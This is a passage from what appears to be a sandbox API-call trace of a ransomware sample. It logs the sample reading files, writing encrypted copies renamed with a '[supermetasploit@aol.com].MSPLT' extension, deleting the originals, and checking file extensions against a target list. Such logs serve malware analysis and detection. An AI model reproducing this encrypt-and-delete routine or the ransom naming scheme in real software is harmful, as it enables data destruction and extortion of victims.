lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0171.896] WriteFile (in: hFile=0x374, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0171.897] ReadFile (in: hFile=0x370, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.897] WriteFile (in: hFile=0x374, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.898] SetEndOfFile (hFile=0x374) returned 1 [0171.898] CloseHandle (hObject=0x374) returned 1 [0171.900] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.900] SetEndOfFile (hFile=0x370) returned 1 [0171.901] CloseHandle (hObject=0x370) returned 1 [0171.901] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.902] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 1 [0171.902] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.902] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.902] lstrlenW (lpString=".doc") returned 4 [0171.902] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.902] lstrlenW (lpString=".docx") returned 5 [0171.902] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.902] lstrlenW (lpString=".pdf") returned 4 [0171.902] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.902] lstrlenW (lpString=".xls") returned 4 [0171.902] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.902] lstrlenW (lpString=".xlsx") returned 5 [0171.902] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.902] lstrlenW (lpString=".ppt") returned 4 [0171.902] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.902] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.902] lstrlenW (lpString=".zip") returned 4 [0171.902] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.902] lstrlenW (lpString=".rar") returned 4 [0171.902] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".bz2") returned 4 [0171.903] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.903] lstrlenW (lpString=".7z") returned 3 [0171.903] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString=".dbf") returned 4 [0171.903] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString=".1cd") returned 4 [0171.903] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString=".jpg") returned 4 [0171.903] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString=".doc") returned 4 [0171.903] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".docx") returned 5 [0171.903] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.903] lstrlenW (lpString=".pdf") returned 4 [0171.903] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".xls") returned 4 [0171.903] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".xlsx") returned 5 [0171.903] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.903] lstrlenW (lpString=".ppt") returned 4 [0171.903] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.903] lstrlenW (lpString=".zip") returned 4 [0171.903] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".rar") returned 4 [0171.903] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.903] lstrlenW (lpString=".bz2") returned 4 [0171.903] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.904] lstrlenW (lpString=".7z") returned 3 [0171.904] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.904] lstrlenW (lpString=".dbf") returned 4 [0171.904] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.904] lstrlenW (lpString=".1cd") returned 4 [0171.904] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0171.904] lstrlenW (lpString=".jpg") returned 4 [0171.904] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.904] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.904] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.904] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.358] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=17752) returned 1 [0172.358] CloseHandle (hObject=0x344) returned 1 [0172.367] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 0x80 [0172.368] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.368] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.368] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.368] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.368] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.368] GetLastError () returned 0x0 [0172.368] ReadFile (in: hFile=0x344, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x4558, lpOverlapped=0x0) returned 1 [0172.372] WriteFile (in: hFile=0x384, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x4560, lpOverlapped=0x0) returned 1 [0172.373] ReadFile (in: hFile=0x344, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.373] WriteFile (in: hFile=0x384, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.373] SetEndOfFile (hFile=0x384) returned 1 [0172.373] CloseHandle (hObject=0x384) returned 1 [0172.377] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.377] SetEndOfFile (hFile=0x344) returned 1 [0172.378] CloseHandle (hObject=0x344) returned 1 [0172.378] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.379] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 1 [0172.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.379] lstrlenW (lpString=".doc") returned 4 [0172.379] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.379] lstrlenW (lpString=".docx") returned 5 [0172.379] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.379] lstrlenW (lpString=".pdf") returned 4 [0172.379] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.379] lstrlenW (lpString=".xls") returned 4 [0172.379] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.379] lstrlenW (lpString=".xlsx") returned 5 [0172.379] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.379] lstrlenW (lpString=".ppt") returned 4 [0172.379] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.379] lstrlenW (lpString=".zip") returned 4 [0172.379] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.379] lstrlenW (lpString=".rar") returned 4 [0172.380] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString=".bz2") returned 4 [0172.380] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.380] lstrlenW (lpString=".7z") returned 3 [0172.380] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString=".dbf") returned 4 [0172.380] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString=".1cd") returned 4 [0172.380] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString=".jpg") returned 4 [0172.380] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString=".doc") returned 4 [0172.380] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString=".docx") returned 5 [0172.380] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.380] lstrlenW (lpString=".pdf") returned 4 [0172.380] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString=".xls") returned 4 [0172.380] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString=".xlsx") returned 5 [0172.380] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.380] lstrlenW (lpString=".ppt") returned 4 [0172.380] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.380] lstrlenW (lpString=".zip") returned 4 [0172.380] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.380] lstrlenW (lpString=".rar") returned 4 [0172.381] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.381] lstrlenW (lpString=".bz2") returned 4 [0172.381] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.381] lstrlenW (lpString=".7z") returned 3 [0172.381] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.381] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.381] lstrlenW (lpString=".dbf") returned 4 [0172.381] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.381] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.381] lstrlenW (lpString=".1cd") returned 4 [0172.381] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.381] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0172.381] lstrlenW (lpString=".jpg") returned 4 [0172.381] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.381] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.381] lstrlenW (lpString="DisplayIcon.ico") returned 15 [0172.381] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.381] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=88533) returned 1 [0172.381] CloseHandle (hObject=0x344) returned 1 [0172.381] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 0x80 [0172.382] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.382] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.382] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.382] GetLastError () returned 0x0 [0172.382] ReadFile (in: hFile=0x344, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x159d5, lpOverlapped=0x0) returned 1 [0172.386] WriteFile (in: hFile=0x384, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x159e0, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x159e0, lpOverlapped=0x0) returned 1 [0172.388] ReadFile (in: hFile=0x344, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.388] WriteFile (in: hFile=0x384, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf2, lpOverlapped=0x0) returned 1 [0172.388] SetEndOfFile (hFile=0x384) returned 1 [0172.388] CloseHandle (hObject=0x384) returned 1 [0172.398] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.398] SetEndOfFile (hFile=0x344) returned 1 [0172.400] CloseHandle (hObject=0x344) returned 1 [0172.400] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.400] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 1 [0172.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.401] lstrlenW (lpString=".doc") returned 4 [0172.401] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.401] lstrlenW (lpString=".docx") returned 5 [0172.401] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0172.401] lstrlenW (lpString=".pdf") returned 4 [0172.401] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.401] lstrlenW (lpString=".xls") returned 4 [0172.401] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.401] lstrlenW (lpString=".xlsx") returned 5 [0172.401] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0172.401] lstrlenW (lpString=".ppt") returned 4 [0172.401] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.401] lstrlenW (lpString=".zip") returned 4 [0172.401] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.401] lstrlenW (lpString=".rar") returned 4 [0172.401] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.401] lstrlenW (lpString=".bz2") returned 4 [0172.401] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.401] lstrlenW (lpString=".7z") returned 3 [0172.402] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.402] lstrlenW (lpString=".dbf") returned 4 [0172.402] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.402] lstrlenW (lpString=".1cd") returned 4 [0172.402] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.402] lstrlenW (lpString=".jpg") returned 4 [0172.402] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.402] lstrlenW (lpString=".doc") returned 4 [0172.402] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.402] lstrlenW (lpString=".docx") returned 5 [0172.402] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0172.402] lstrlenW (lpString=".pdf") returned 4 [0172.402] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.402] lstrlenW (lpString=".xls") returned 4 [0172.402] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.402] lstrlenW (lpString=".xlsx") returned 5 [0172.402] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0172.402] lstrlenW (lpString=".ppt") returned 4 [0172.402] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.403] lstrlenW (lpString=".zip") returned 4 [0172.403] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.403] lstrlenW (lpString=".rar") returned 4 [0172.403] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.403] lstrlenW (lpString=".bz2") returned 4 [0172.403] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.403] lstrlenW (lpString=".7z") returned 3 [0172.403] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.403] lstrlenW (lpString=".dbf") returned 4 [0172.403] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.403] lstrlenW (lpString=".1cd") returned 4 [0172.403] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0172.403] lstrlenW (lpString=".jpg") returned 4 [0172.403] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.403] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.403] lstrlenW (lpString="Print.ico") returned 9 [0172.403] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.463] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=1150) returned 1 [0172.463] CloseHandle (hObject=0x344) returned 1 [0172.463] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 0x80 [0172.476] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.483] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.483] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.483] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.483] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0172.910] GetLastError () returned 0x0 [0172.910] ReadFile (in: hFile=0x378, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x47e, lpOverlapped=0x0) returned 1 [0173.023] WriteFile (in: hFile=0x30c, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x480, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x378, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0173.024] WriteFile (in: hFile=0x30c, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xe6, lpOverlapped=0x0) returned 1 [0173.024] SetEndOfFile (hFile=0x30c) returned 1 [0173.024] CloseHandle (hObject=0x30c) returned 1 [0173.026] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.026] SetEndOfFile (hFile=0x378) returned 1 [0173.027] CloseHandle (hObject=0x378) returned 1 [0173.027] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.029] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 1 [0173.031] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.031] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.031] lstrlenW (lpString=".doc") returned 4 [0173.031] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.031] lstrlenW (lpString=".docx") returned 5 [0173.031] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0173.031] lstrlenW (lpString=".pdf") returned 4 [0173.032] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString=".xls") returned 4 [0173.032] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString=".xlsx") returned 5 [0173.032] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0173.032] lstrlenW (lpString=".ppt") returned 4 [0173.032] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString=".zip") returned 4 [0173.032] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString=".rar") returned 4 [0173.032] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString=".bz2") returned 4 [0173.032] lstrcmpiW 